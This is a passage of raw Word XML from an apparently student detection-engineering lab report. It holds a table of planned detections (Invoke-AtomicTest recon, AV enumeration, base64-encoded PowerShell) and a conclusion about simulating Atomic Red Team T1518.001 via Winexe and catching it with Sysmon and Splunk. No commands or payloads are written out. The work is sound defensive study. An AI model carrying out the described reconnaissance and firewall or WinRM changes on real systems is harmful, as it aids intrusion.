                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Correlate Execution + Network telemetry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4555" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="67D48DB4" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="360" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE46A0">
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Build alert logic to catch execution + inbound TCP (as you’re already doing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidTr="00A44022" w14:paraId="023CF3AB" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="680"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3540" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="0A8F9A6E" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="360" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE46A0">
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Add detection for base64-encoded PowerShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4555" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidP="00445989" w:rsidRDefault="00A44022" w14:paraId="4224361E" w14:textId="77777777">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE46A0">
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Catch obfuscated execution patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="5740C5B7" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="5623F13B" w14:textId="3BEA561A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc193890132" w:id="16"/>
      <w:r>
        <w:t>3.8 Strategic Improvements</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="012AD731" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="80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540"/>
        <w:gridCol w:w="4555"/>
      </w:tblGrid>
      <w:tr w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidTr="00A44022" w14:paraId="5F04993C" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="340"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3540" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="54E2A04B" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A44022">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4555" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="152C494C" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A44022">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidTr="00A44022" w14:paraId="7C039052" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1020"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3540" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="4E778E94" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A44022">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Create detection for Invoke-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A44022">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>AtomicTest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A44022">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> or equivalent recon patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4555" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="5BA5A04D" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A44022">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Prevent future recon from going unnoticed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidTr="00A44022" w14:paraId="0C748066" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="680"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3540" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="2FC49EA3" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A44022">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Create a detection for AV keyword filtering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4555" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="2506AF01" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A44022">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>High-fidelity signal of post-access recon</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidTr="00A44022" w14:paraId="2F7E18B9" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1020"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3540" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="6C6E8405" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A44022">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Correlate Execution + Network telemetry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4555" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="66CBB225" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A44022">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Build alert logic to catch execution + inbound TCP (as you’re already doing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidTr="00A44022" w14:paraId="577B418E" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="680"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3540" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="13873E89" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A44022">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Add detection for base64-encoded PowerShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4555" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="4676D2A1" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A44022">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Catch obfuscated execution patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="2FABD772" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="53F2265F" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="04EFA504" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F5E5E" w:rsidP="76BE3725" w:rsidRDefault="06482D2A" w14:paraId="02476A2C" w14:textId="27A15535">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc193890133" w:id="17"/>
      <w:r w:rsidRPr="76BE3725">
        <w:t>4.Submission details</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w:rsidR="007921FA" w:rsidP="76BE3725" w:rsidRDefault="007921FA" w14:paraId="0992FADE" w14:textId="63EB63D1">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007921FA" w:rsidP="76BE3725" w:rsidRDefault="007921FA" w14:paraId="58613712" w14:textId="4FC74496">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="76BE3725">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>List any specific submission details corresponding to the lab activities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="007921FA" w:rsidR="007921FA" w:rsidP="76BE3725" w:rsidRDefault="007921FA" w14:paraId="2A9F08EF" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00BD212D" w:rsidR="003566BB" w:rsidP="00BD212D" w:rsidRDefault="06482D2A" w14:paraId="2755CA89" w14:textId="3F984D95">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc193890134" w:id="18"/>
      <w:r w:rsidRPr="76BE3725">
        <w:t>5.Conclusion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w:rsidRPr="00BD212D" w:rsidR="00904CE2" w:rsidP="00BD212D" w:rsidRDefault="00BD212D" w14:paraId="19E58084" w14:textId="14E585B7">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:ind w:firstLine="720"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD212D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">This lab simulated a security software discovery attack using Atomic Red Team T1518.001 executed remotely via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD212D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Winexe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD212D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, illustrating how adversaries </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD212D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">perform post-compromise reconnaissance. Leveraging Sysmon event logging and Splunk, we correlated process creation events with specific command-line patterns to detect enumeration of AV tools, firewall configurations, and Sysmon presence. We analyzed encoded PowerShell payloads used to enable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD212D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD212D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>, reconfigure SMB, and adjust firewall rules for persistent access. Detection logic was refined using SPL queries targeting key process behaviors and network telemetry, while response actions included host firewall rule enforcement and system configuration rollback. The exercise underscores the necessity of command-line visibility, PowerShell logging, and correlation between endpoint and network telemetry in effective detection engineering.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidRPr="00BD212D" w:rsidR="00904CE2" w:rsidSect="00296936">
      <w:pgSz w:w="10800" w:h="14400" w:orient="landscape"/>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85D58" w:rsidP="00600D56" w:rsidRDefault="00285D58" w14:paraId="165209CB" w14:textId="77777777">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00285D58" w:rsidP="00600D56" w:rsidRDefault="00285D58" w14:paraId="326CC21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embedRegular w:fontKey="{F8599379-DBED-BB4A-9493-A3398FD1DC89}" r:id="rId1"/>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w:fontKey="{BB02D5C9-4C21-984B-8047-8810A78A10BF}" r:id="rId2"/>
    <w:embedBold w:fontKey="{A0CCD47D-F897-E24A-B768-FD324692E52D}" r:id="rId3"/>
    <w:embedItalic w:fontKey="{09CFE017-E304-6149-BF4C-B035BC67477F}" r:id="rId4"/>
  </w:font>
  <w:font w:name="Arial">
    <w:panose1 w:val="020B0604020202020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E0002AFF" w:usb1="C0007843" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
    <w:embedRegular w:fontKey="{D4560EB4-6000-6241-BCA0-18356AFDEAA7}" w:subsetted="1" r:id="rId5"/>
  </w:font>
  <w:font w:name="Aptos">
    <w:panose1 w:val="020B0004020202020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="20000287" w:usb1="00000003" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
    <w:embedRegular w:fontKey="{C98F45DD-6EDE-EF4E-A124-0E964E963584}" r:id="rId6"/>
    <w:embedBold w:fontKey="{F25A2C5C-1A04-A541-A85D-3088F4737A47}" r:id="rId7"/>
    <w:embedItalic w:fontKey="{3784E9AC-3429-6247-831D-9139E2EC6BBE}" r:id="rId8"/>
  </w:font>
  <w:font w:name="Apple Color Emoji">
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="00000003" w:usb1="18000000" w:usb2="14000000" w:usb3="00000000" w:csb0="00000001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Aptos Narrow">
    <w:panose1 w:val="020B0004020202020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="20000287" w:usb1="00000003" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
    <w:embedRegular w:fontKey="{8D50411C-378B-EA4A-9EEE-794A4109FA11}" r:id="rId10"/>
    <w:embedBold w:fontKey="{0BFC565F-AB1A-1643-B5FE-AFA34294C404}" r:id="rId11"/>
  </w:font>
  <w:font w:name="Arial Unicode MS">
    <w:panose1 w:val="020B0604020202020204"/>
    <w:charset w:val="80"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="F7FFAFFF" w:usb1="E9DFFFFF" w:usb2="0000003F" w:usb3="00000000" w:csb0="003F01FF" w:csb1="00000000"/>
    <w:embedRegular w:fontKey="{783162F5-DF9A-C841-A9DA-4EC6CC816E88}" w:subsetted="1" r:id="rId12"/>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85D58" w:rsidP="00600D56" w:rsidRDefault="00285D58" w14:paraId="4A9B1B02" w14:textId="77777777">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00285D58" w:rsidP="00600D56" w:rsidRDefault="00285D58" w14:paraId="1FBA3C8A"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1615A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="28E43BE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042612F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4162AC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914498A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0876EF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BF36494"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B46E8176"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:b/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1272" w:hanging="552"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1800" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:sz w:val="32"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:sz w:val="32"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="1080"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:sz w:val="32"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3240" w:hanging="1080"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:sz w:val="32"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3960" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:sz w:val="32"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
